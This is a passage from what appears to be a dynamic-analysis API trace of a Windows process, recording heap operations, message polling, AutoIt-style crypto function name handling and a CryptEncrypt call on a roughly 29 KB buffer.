hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0268.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0268.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0268.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0268.042] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0268.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0268.042] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0268.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0268.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0268.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d48 [0268.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0268.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0268.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0268.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0268.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x731b) returned 0x2f16018 [0268.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55068 [0268.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0268.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0268.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550c8 [0268.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0268.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0268.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f68 [0268.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0268.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0268.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51868 [0268.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0268.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0268.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0268.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0268.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x731b) returned 0x2f24668 [0268.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0268.044] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.044] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.044] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.044] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.045] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.045] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.045] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0268.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0268.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.045] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.045] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.045] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0268.045] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0268.045] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.046] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0268.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0268.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.046] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.046] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.046] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.046] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.046] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.046] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0268.046] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.046] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0268.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.046] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.047] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0268.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51e98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0268.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0268.047] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0268.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0268.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0268.048] CryptEncrypt (in: hKey=0xa86f50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x731b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x7320) returned 1 [0268.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15c40 [0268.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0268.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0268.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0268.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0268.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0268.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0268.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0268.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0268.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0268.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0268.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0268.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0268.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0268.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0268.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0268.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0268.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0268.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0268.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0268.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0268.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0268.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0268.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0268.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0268.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0268.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0268.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0268.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0268.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0268.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0268.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0268.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0268.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0268.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0268.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0268.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0268.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0268.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0268.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0268.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0268.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0268.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0268.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0268.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0268.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0268.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0268.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0268.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0268.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0268.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0268.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0268.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0268.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0268.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0268.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0268.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0268.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0268.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0268.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0268.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0268.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0268.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0268.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0268.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0268.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0268.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0268.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0268.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0268.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0268.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0268.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0268.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0268.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0268.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0268.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0268.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0268.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0268.053] CharLowerBuffW (in: lpsz="byte[29472]", cchLength=0xb | out: lpsz="byte[29472]") returned 0xb [0268.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0268.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0268.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0268.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0268.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0268.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0268.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0268.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0268.053] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0268.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0268.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0268.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0268.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0268.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0268.054] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0268.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0268.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0268.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0268.054] CharUpperBuffW (in: 